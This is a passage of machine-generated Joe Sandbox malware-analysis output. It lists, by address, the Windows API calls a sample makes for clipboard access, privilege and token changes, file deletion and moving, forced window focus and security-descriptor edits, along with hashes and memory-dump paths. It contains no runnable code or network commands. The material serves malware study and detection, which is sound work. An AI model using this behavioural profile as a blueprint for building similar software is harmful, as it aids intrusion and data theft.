                                                • Associated: 00000000.00000002.2144539500.0000000000B4E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144586478.0000000000B5A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144602971.0000000000B64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_aa0000_MGQeZjDXc3.jbxd
                                                Similarity
                                                • API ID: MessageSend$ClientScreen$Image$CursorDragList_LongStateWindow$CaptureMenuPopupTrack$BeginEnterInvalidateParentProcRectRelease_wcsncpy
                                                • String ID: @GUI_DRAGID$F
                                                • API String ID: 2516578528-4164748364
                                                • Opcode ID: 8d043fc3e0e51230b7787d6344713581a8b8f7736c9cbfb32bed74544f678aa6
                                                • Instruction ID: 28e39e0d40fea836bbe9ab628a2284589051d7afd36b9271f0f6ad66ae56a4c2
                                                • Opcode Fuzzy Hash: 8d043fc3e0e51230b7787d6344713581a8b8f7736c9cbfb32bed74544f678aa6
                                                • Instruction Fuzzy Hash: 26329B74604346EFDB20CF28C884AAABBE8FF49354F148AA9F655876E1CB71DC41CB51
                                                APIs
                                                • SendMessageW.USER32(?,00000400,00000000,00000000), ref: 00B0B1CD
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2144486728.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                • Associated: 00000000.00000002.2144466799.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144539500.0000000000B2D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144539500.0000000000B4E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144586478.0000000000B5A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144602971.0000000000B64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_aa0000_MGQeZjDXc3.jbxd
                                                Similarity
                                                • API ID: MessageSend
                                                • String ID: %d/%02d/%02d
                                                • API String ID: 3850602802-328681919
                                                • Opcode ID: 6b65a4c6bcc0bc709ae34fc47155f182669dd6b456131377a7626793a533ed7e
                                                • Instruction ID: a5a3d9eb961b7a0b18d558d00dcfff17f4b876dd1d3b08d2544658427d2a4b57
                                                • Opcode Fuzzy Hash: 6b65a4c6bcc0bc709ae34fc47155f182669dd6b456131377a7626793a533ed7e
                                                • Instruction Fuzzy Hash: FB12BC71500308ABEB258F64CC89FAA7FF8EF45710F2445A9F91AEB2D1DB748942CB11
                                                APIs
                                                • GetForegroundWindow.USER32(00000000,00000000), ref: 00ABEB4A
                                                • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00B13AEA
                                                • IsIconic.USER32(000000FF), ref: 00B13AF3
                                                • ShowWindow.USER32(000000FF,00000009), ref: 00B13B00
                                                • SetForegroundWindow.USER32(000000FF), ref: 00B13B0A
                                                • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00B13B20
                                                • GetCurrentThreadId.KERNEL32 ref: 00B13B27
                                                • GetWindowThreadProcessId.USER32(000000FF,00000000), ref: 00B13B33
                                                • AttachThreadInput.USER32(000000FF,00000000,00000001), ref: 00B13B44
                                                • AttachThreadInput.USER32(000000FF,00000000,00000001), ref: 00B13B4C
                                                • AttachThreadInput.USER32(00000000,?,00000001), ref: 00B13B54
                                                • SetForegroundWindow.USER32(000000FF), ref: 00B13B57
                                                • MapVirtualKeyW.USER32(00000012,00000000), ref: 00B13B6C
                                                • keybd_event.USER32(00000012,00000000), ref: 00B13B77
                                                • MapVirtualKeyW.USER32(00000012,00000000), ref: 00B13B81
                                                • keybd_event.USER32(00000012,00000000), ref: 00B13B86
                                                • MapVirtualKeyW.USER32(00000012,00000000), ref: 00B13B8F
                                                • keybd_event.USER32(00000012,00000000), ref: 00B13B94
                                                • MapVirtualKeyW.USER32(00000012,00000000), ref: 00B13B9E
                                                • keybd_event.USER32(00000012,00000000), ref: 00B13BA3
                                                • SetForegroundWindow.USER32(000000FF), ref: 00B13BA6
                                                • AttachThreadInput.USER32(000000FF,?,00000000), ref: 00B13BCD
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2144486728.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                • Associated: 00000000.00000002.2144466799.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144539500.0000000000B2D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144539500.0000000000B4E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144586478.0000000000B5A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144602971.0000000000B64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_aa0000_MGQeZjDXc3.jbxd
                                                Similarity
                                                • API ID: Window$Thread$AttachForegroundInputVirtualkeybd_event$Process$CurrentFindIconicShow
                                                • String ID: Shell_TrayWnd
                                                • API String ID: 4125248594-2988720461
                                                • Opcode ID: 852b43cecce95a8ac053aaa24e1c8cb822ce76533c96b1cd265ec1d1d889d82c
                                                • Instruction ID: 8619bd3309436bd6a1425b0a850c25b65800046a96de7668ff9a8ae0ec7e6b7b
                                                • Opcode Fuzzy Hash: 852b43cecce95a8ac053aaa24e1c8cb822ce76533c96b1cd265ec1d1d889d82c
                                                • Instruction Fuzzy Hash: 5E31B471A40218BBEB316F658C49FBF7EACEF44B50F504065FA05EB1D0EAB15D41ABA0
                                                APIs
                                                  • Part of subcall function 00ADB134: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00ADB180
                                                  • Part of subcall function 00ADB134: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00ADB1AD
                                                  • Part of subcall function 00ADB134: GetLastError.KERNEL32 ref: 00ADB1BA
                                                • _memset.LIBCMT ref: 00ADAD08
                                                • DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?,?,?,?,00000001,?,?), ref: 00ADAD5A
                                                • CloseHandle.KERNEL32(?), ref: 00ADAD6B
                                                • OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 00ADAD82
                                                • GetProcessWindowStation.USER32 ref: 00ADAD9B
                                                • SetProcessWindowStation.USER32(00000000), ref: 00ADADA5
                                                • OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 00ADADBF
                                                  • Part of subcall function 00ADAB84: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00ADACC0), ref: 00ADAB99
                                                  • Part of subcall function 00ADAB84: CloseHandle.KERNEL32(?,?,00ADACC0), ref: 00ADABAB
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2144486728.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                • Associated: 00000000.00000002.2144466799.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144539500.0000000000B2D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144539500.0000000000B4E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144586478.0000000000B5A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144602971.0000000000B64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_aa0000_MGQeZjDXc3.jbxd
                                                Similarity
                                                • API ID: StationTokenWindow$AdjustCloseHandleOpenPrivilegesProcess$DesktopDuplicateErrorLastLookupPrivilegeValue_memset
                                                • String ID: $default$winsta0
                                                • API String ID: 2063423040-1027155976
                                                • Opcode ID: 142173cf3888bb0be7b1aecdf7aab864ecc95e54db399a706673b53358cd9d3e
                                                • Instruction ID: 004c245769e0cdb9fea9b76e638626fc378494cbda51b06c5ee2219b5c9585f6
                                                • Opcode Fuzzy Hash: 142173cf3888bb0be7b1aecdf7aab864ecc95e54db399a706673b53358cd9d3e
                                                • Instruction Fuzzy Hash: 8A818C71900209AFDF21DFA4CD49EEEBBB9FF18304F04415AF816A6261DB318E55DB62
                                                APIs
                                                  • Part of subcall function 00AE6EBB: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00AE5FA6,?), ref: 00AE6ED8
                                                  • Part of subcall function 00AE6EBB: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,00AE5FA6,?), ref: 00AE6EF1
                                                  • Part of subcall function 00AE725E: __wsplitpath.LIBCMT ref: 00AE727B
                                                  • Part of subcall function 00AE725E: __wsplitpath.LIBCMT ref: 00AE728E
                                                  • Part of subcall function 00AE72CB: GetFileAttributesW.KERNEL32(?,00AE6019), ref: 00AE72CC
                                                • _wcscat.LIBCMT ref: 00AE6149
                                                • _wcscat.LIBCMT ref: 00AE6167
                                                • __wsplitpath.LIBCMT ref: 00AE618E
                                                • FindFirstFileW.KERNEL32(?,?), ref: 00AE61A4
                                                • _wcscpy.LIBCMT ref: 00AE6209
                                                • _wcscat.LIBCMT ref: 00AE621C
                                                • _wcscat.LIBCMT ref: 00AE622F
                                                • lstrcmpiW.KERNEL32(?,?), ref: 00AE625D
                                                • DeleteFileW.KERNEL32(?), ref: 00AE626E
                                                • MoveFileW.KERNEL32(?,?), ref: 00AE6289
                                                • MoveFileW.KERNEL32(?,?), ref: 00AE6298
                                                • CopyFileW.KERNEL32(?,?,00000000), ref: 00AE62AD
                                                • DeleteFileW.KERNEL32(?), ref: 00AE62BE
                                                • FindNextFileW.KERNEL32(00000000,00000010), ref: 00AE62E1
                                                • FindClose.KERNEL32(00000000), ref: 00AE62FD
                                                • FindClose.KERNEL32(00000000), ref: 00AE630B
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2144486728.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                • Associated: 00000000.00000002.2144466799.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144539500.0000000000B2D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144539500.0000000000B4E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144586478.0000000000B5A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144602971.0000000000B64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_aa0000_MGQeZjDXc3.jbxd
                                                Similarity
                                                • API ID: File$Find_wcscat$__wsplitpath$CloseDeleteFullMoveNamePath$AttributesCopyFirstNext_wcscpylstrcmpi
                                                • String ID: \*.*$p1#v`K$v
                                                • API String ID: 1917200108-1732502266
                                                • Opcode ID: 27012759ed363ecd7105a03d631d84e12ac081e0ab4a9e9f978a9428cd26c3b1
                                                • Instruction ID: 2b65065d1caf2c9eae82fadace1b0032ed6586865f6e664cc754354ca8f5a149
                                                • Opcode Fuzzy Hash: 27012759ed363ecd7105a03d631d84e12ac081e0ab4a9e9f978a9428cd26c3b1
                                                • Instruction Fuzzy Hash: 7C513472C0815CAACB21EBA2CD45EDF77BCAF15340F0505EAE645E3141DE3697498FA4
                                                APIs
                                                • OpenClipboard.USER32(00B3DC00), ref: 00AF6B36
                                                • IsClipboardFormatAvailable.USER32(0000000D), ref: 00AF6B44
                                                • GetClipboardData.USER32(0000000D), ref: 00AF6B4C
                                                • CloseClipboard.USER32 ref: 00AF6B58
                                                • GlobalLock.KERNEL32(00000000), ref: 00AF6B74
                                                • CloseClipboard.USER32 ref: 00AF6B7E
                                                • GlobalUnlock.KERNEL32(00000000), ref: 00AF6B93
                                                • IsClipboardFormatAvailable.USER32(00000001), ref: 00AF6BA0
                                                • GetClipboardData.USER32(00000001), ref: 00AF6BA8
                                                • GlobalLock.KERNEL32(00000000), ref: 00AF6BB5
                                                • GlobalUnlock.KERNEL32(00000000), ref: 00AF6BE9
                                                • CloseClipboard.USER32 ref: 00AF6CF6
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2144486728.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                • Associated: 00000000.00000002.2144466799.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144539500.0000000000B2D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144539500.0000000000B4E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144586478.0000000000B5A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144602971.0000000000B64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_aa0000_MGQeZjDXc3.jbxd
                                                Similarity
                                                • API ID: Clipboard$Global$Close$AvailableDataFormatLockUnlock$Open
                                                • String ID:
                                                • API String ID: 3222323430-0
                                                • Opcode ID: aae5492ae84b36b5a74a3c544004d6f575ac1023ad3b73d8e67484d20eae4087
                                                • Instruction ID: 251b494f0bd72f41f0d5bfde4339ab7ea1564d158a37377e8ceff54339668cdd
                                                • Opcode Fuzzy Hash: aae5492ae84b36b5a74a3c544004d6f575ac1023ad3b73d8e67484d20eae4087
                                                • Instruction Fuzzy Hash: 1451A271240205ABE311EFA0DD86F7E77A8EF59B10F000529F696D72E1DF70D9068B62
                                                APIs
                                                • FindFirstFileW.KERNEL32(?,?), ref: 00AEF62B
                                                • FindClose.KERNEL32(00000000), ref: 00AEF67F
                                                • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00AEF6A4
                                                • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00AEF6BB
                                                • FileTimeToSystemTime.KERNEL32(?,?), ref: 00AEF6E2
                                                • __swprintf.LIBCMT ref: 00AEF72E
                                                • __swprintf.LIBCMT ref: 00AEF767
                                                • __swprintf.LIBCMT ref: 00AEF7BB
                                                  • Part of subcall function 00AC172B: __woutput_l.LIBCMT ref: 00AC1784
                                                • __swprintf.LIBCMT ref: 00AEF809
                                                • __swprintf.LIBCMT ref: 00AEF858
                                                • __swprintf.LIBCMT ref: 00AEF8A7
                                                • __swprintf.LIBCMT ref: 00AEF8F6
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2144486728.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                • Associated: 00000000.00000002.2144466799.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144539500.0000000000B2D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144539500.0000000000B4E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144586478.0000000000B5A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144602971.0000000000B64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_aa0000_MGQeZjDXc3.jbxd
                                                Similarity
                                                • API ID: __swprintf$FileTime$FindLocal$CloseFirstSystem__woutput_l
                                                • String ID: %02d$%4d$%4d%02d%02d%02d%02d%02d
                                                • API String ID: 835046349-2428617273
                                                • Opcode ID: 52f806f189fcde1bf62a2fada02eda649d68d4196bc7bbd7ac9de5c03e5484a0
                                                • Instruction ID: 101c4369710b2f5851b1dd007c1e6f4781bff192bd37ebd3c75d03e4f7eee163
                                                • Opcode Fuzzy Hash: 52f806f189fcde1bf62a2fada02eda649d68d4196bc7bbd7ac9de5c03e5484a0
                                                • Instruction Fuzzy Hash: 88A12FB2508344ABD310EB95C985EAFB7ECEF99700F40082EF595C7192EB34D949CB62
                                                APIs
                                                • FindFirstFileW.KERNEL32(?,?,76228FB0,?,00000000), ref: 00AF1B50
                                                • _wcscmp.LIBCMT ref: 00AF1B65
                                                • _wcscmp.LIBCMT ref: 00AF1B7C
                                                • GetFileAttributesW.KERNEL32(?), ref: 00AF1B8E
                                                • SetFileAttributesW.KERNEL32(?,?), ref: 00AF1BA8
                                                • FindNextFileW.KERNEL32(00000000,?), ref: 00AF1BC0
                                                • FindClose.KERNEL32(00000000), ref: 00AF1BCB
                                                • FindFirstFileW.KERNEL32(*.*,?), ref: 00AF1BE7
                                                • _wcscmp.LIBCMT ref: 00AF1C0E
                                                • _wcscmp.LIBCMT ref: 00AF1C25
                                                • SetCurrentDirectoryW.KERNEL32(?), ref: 00AF1C37
                                                • SetCurrentDirectoryW.KERNEL32(00B539FC), ref: 00AF1C55
                                                • FindNextFileW.KERNEL32(00000000,00000010), ref: 00AF1C5F
                                                • FindClose.KERNEL32(00000000), ref: 00AF1C6C
                                                • FindClose.KERNEL32(00000000), ref: 00AF1C7C
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2144486728.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                • Associated: 00000000.00000002.2144466799.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144539500.0000000000B2D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144539500.0000000000B4E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144586478.0000000000B5A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144602971.0000000000B64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_aa0000_MGQeZjDXc3.jbxd
                                                Similarity
                                                • API ID: Find$File$_wcscmp$Close$AttributesCurrentDirectoryFirstNext
                                                • String ID: *.*
                                                • API String ID: 1803514871-438819550
                                                • Opcode ID: c658dd57b23a440e9059756f55d8590ff53eae6ae1d023fa50f4cfcfee070f16
                                                • Instruction ID: 1b9c6794ef68b3e464d09d6fb30d88f5357f87e33bc3ade7adf3749f0026f41c
                                                • Opcode Fuzzy Hash: c658dd57b23a440e9059756f55d8590ff53eae6ae1d023fa50f4cfcfee070f16
                                                • Instruction Fuzzy Hash: 4A31A23260021DEEDB21ABE0DC49FEE77ECAF05361F104195FA15E31A0EB74DA468A64
                                                APIs
                                                • FindFirstFileW.KERNEL32(?,?,76228FB0,?,00000000), ref: 00AF1CAB
                                                • _wcscmp.LIBCMT ref: 00AF1CC0
                                                • _wcscmp.LIBCMT ref: 00AF1CD7
                                                  • Part of subcall function 00AE6BD4: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 00AE6BEF
                                                • FindNextFileW.KERNEL32(00000000,?), ref: 00AF1D06
                                                • FindClose.KERNEL32(00000000), ref: 00AF1D11
                                                • FindFirstFileW.KERNEL32(*.*,?), ref: 00AF1D2D
                                                • _wcscmp.LIBCMT ref: 00AF1D54
                                                • _wcscmp.LIBCMT ref: 00AF1D6B
                                                • SetCurrentDirectoryW.KERNEL32(?), ref: 00AF1D7D
                                                • SetCurrentDirectoryW.KERNEL32(00B539FC), ref: 00AF1D9B
                                                • FindNextFileW.KERNEL32(00000000,00000010), ref: 00AF1DA5
                                                • FindClose.KERNEL32(00000000), ref: 00AF1DB2
                                                • FindClose.KERNEL32(00000000), ref: 00AF1DC2
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2144486728.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                • Associated: 00000000.00000002.2144466799.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144539500.0000000000B2D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144539500.0000000000B4E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144586478.0000000000B5A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144602971.0000000000B64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_aa0000_MGQeZjDXc3.jbxd
                                                Similarity
                                                • API ID: Find$File$_wcscmp$Close$CurrentDirectoryFirstNext$Create
                                                • String ID: *.*
                                                • API String ID: 1824444939-438819550
                                                • Opcode ID: 5ca8f371e6b482b35b0edfb1c6c7cc2718b4fd7fcf3980461df97707a5f43697
                                                • Instruction ID: 29ad59889f318974bb8dff873aa75cacf311db63023d53a9e1d3f5d108446603
                                                • Opcode Fuzzy Hash: 5ca8f371e6b482b35b0edfb1c6c7cc2718b4fd7fcf3980461df97707a5f43697
                                                • Instruction Fuzzy Hash: F331F23250061EAEDF20EFE0DC49EEE37BC9F45364F104595FA11A31A1EB70DE468A64
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2144486728.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                • Associated: 00000000.00000002.2144466799.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144539500.0000000000B2D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144539500.0000000000B4E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144586478.0000000000B5A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144602971.0000000000B64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_aa0000_MGQeZjDXc3.jbxd
                                                Similarity
                                                • API ID: _memset
                                                • String ID: Q\E$[$[:<:]]$[:>:]]$\$\$\$\b(?<=\w)$\b(?=\w)$]$^
                                                • API String ID: 2102423945-2023335898
                                                • Opcode ID: 0fe9c19358df34230cb3b11f200f2e646b1e001f429e76fb7322c705f302e6af
                                                • Instruction ID: c3e0053b1498a9ec87982c9b831f8ded965f36567a79d20b96c51f86dc1be8b5
                                                • Opcode Fuzzy Hash: 0fe9c19358df34230cb3b11f200f2e646b1e001f429e76fb7322c705f302e6af
                                                • Instruction Fuzzy Hash: E0828F71D0421ADBCF24CF98C8806FEB7B1FF49310F6581A9D859AB291E7749D85CB90
                                                APIs
                                                • GetLocalTime.KERNEL32(?), ref: 00AF09DF
                                                • SystemTimeToFileTime.KERNEL32(?,?), ref: 00AF09EF
                                                • LocalFileTimeToFileTime.KERNEL32(?,?), ref: 00AF09FB
                                                • __wsplitpath.LIBCMT ref: 00AF0A59
                                                • _wcscat.LIBCMT ref: 00AF0A71
                                                • _wcscat.LIBCMT ref: 00AF0A83
                                                • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00AF0A98
                                                • SetCurrentDirectoryW.KERNEL32(?), ref: 00AF0AAC
                                                • SetCurrentDirectoryW.KERNEL32(?), ref: 00AF0ADE
                                                • SetCurrentDirectoryW.KERNEL32(?), ref: 00AF0AFF
                                                • _wcscpy.LIBCMT ref: 00AF0B0B
                                                • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 00AF0B4A
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2144486728.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                • Associated: 00000000.00000002.2144466799.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144539500.0000000000B2D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144539500.0000000000B4E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144586478.0000000000B5A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144602971.0000000000B64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_aa0000_MGQeZjDXc3.jbxd
                                                Similarity
                                                • API ID: CurrentDirectoryTime$File$Local_wcscat$System__wsplitpath_wcscpy
                                                • String ID: *.*
                                                • API String ID: 3566783562-438819550
                                                • Opcode ID: 3fda29072228803a9380967b62e8100d26193f5e6edc9f25c7c420712d8fdcea
                                                • Instruction ID: a398570a9d1d3fa23f842e571d79c1d823e45d9e3bf14c846f12f29c2af14a5f
                                                • Opcode Fuzzy Hash: 3fda29072228803a9380967b62e8100d26193f5e6edc9f25c7c420712d8fdcea
                                                • Instruction Fuzzy Hash: 18614B725042099FD710DF60C985EAEB3E8FF89314F04491EFA99D7252EB31E945CB92
                                                APIs
                                                  • Part of subcall function 00ADABBB: GetUserObjectSecurity.USER32(?,?,?,00000000,?), ref: 00ADABD7
                                                  • Part of subcall function 00ADABBB: GetLastError.KERNEL32(?,00ADA69F,?,?,?), ref: 00ADABE1
                                                  • Part of subcall function 00ADABBB: GetProcessHeap.KERNEL32(00000008,?,?,00ADA69F,?,?,?), ref: 00ADABF0
                                                  • Part of subcall function 00ADABBB: HeapAlloc.KERNEL32(00000000,?,00ADA69F,?,?,?), ref: 00ADABF7
                                                  • Part of subcall function 00ADABBB: GetUserObjectSecurity.USER32(?,?,00000000,?,?), ref: 00ADAC0E
                                                  • Part of subcall function 00ADAC56: GetProcessHeap.KERNEL32(00000008,00ADA6B5,00000000,00000000,?,00ADA6B5,?), ref: 00ADAC62
                                                  • Part of subcall function 00ADAC56: HeapAlloc.KERNEL32(00000000,?,00ADA6B5,?), ref: 00ADAC69
                                                  • Part of subcall function 00ADAC56: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00ADA6B5,?), ref: 00ADAC7A
                                                • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00ADA6D0
                                                • _memset.LIBCMT ref: 00ADA6E5
                                                • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 00ADA704
                                                • GetLengthSid.ADVAPI32(?), ref: 00ADA715
                                                • GetAce.ADVAPI32(?,00000000,?), ref: 00ADA752
                                                • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00ADA76E
                                                • GetLengthSid.ADVAPI32(?), ref: 00ADA78B
                                                • GetProcessHeap.KERNEL32(00000008,-00000008), ref: 00ADA79A
                                                • HeapAlloc.KERNEL32(00000000), ref: 00ADA7A1
                                                • GetLengthSid.ADVAPI32(?,00000008,?), ref: 00ADA7C2
                                                • CopySid.ADVAPI32(00000000), ref: 00ADA7C9
                                                • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00ADA7FA
                                                • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00ADA820
                                                • SetUserObjectSecurity.USER32(?,00000004,?), ref: 00ADA834
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2144486728.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                • Associated: 00000000.00000002.2144466799.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144539500.0000000000B2D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144539500.0000000000B4E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144586478.0000000000B5A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144602971.0000000000B64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_aa0000_MGQeZjDXc3.jbxd
                                                Similarity
                                                • API ID: HeapSecurity$AllocDescriptorLengthObjectProcessUser$Dacl$CopyErrorInformationInitializeLast_memset
                                                • String ID:
                                                • API String ID: 3996160137-0
                                                • Opcode ID: 6c5e1f5b5e9c8e00ff53ffdc1aa32e2fe2d77a585761ce636da22c4758222f48
                                                • Instruction ID: d49a9d1a248ce24d45a05240ad89851dba08fd1bc8ea948b8ed874816795846f
                                                • Opcode Fuzzy Hash: 6c5e1f5b5e9c8e00ff53ffdc1aa32e2fe2d77a585761ce636da22c4758222f48
                                                • Instruction Fuzzy Hash: 6F514971900209AFDF10DFA5DC45EEEBBB9FF14300F14812AF912AB290DB749A06DB61
                                                APIs
                                                  • Part of subcall function 00AE6EBB: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00AE5FA6,?), ref: 00AE6ED8
                                                  • Part of subcall function 00AE72CB: GetFileAttributesW.KERNEL32(?,00AE6019), ref: 00AE72CC
                                                • _wcscat.LIBCMT ref: 00AE6441
                                                • __wsplitpath.LIBCMT ref: 00AE645F
                                                • FindFirstFileW.KERNEL32(?,?), ref: 00AE6474
                                                • _wcscpy.LIBCMT ref: 00AE64A3
                                                • _wcscat.LIBCMT ref: 00AE64B8
                                                • _wcscat.LIBCMT ref: 00AE64CA
                                                • DeleteFileW.KERNEL32(?), ref: 00AE64DA
                                                • FindNextFileW.KERNEL32(00000000,00000010), ref: 00AE64EB
                                                • FindClose.KERNEL32(00000000), ref: 00AE6506
                                                Strings
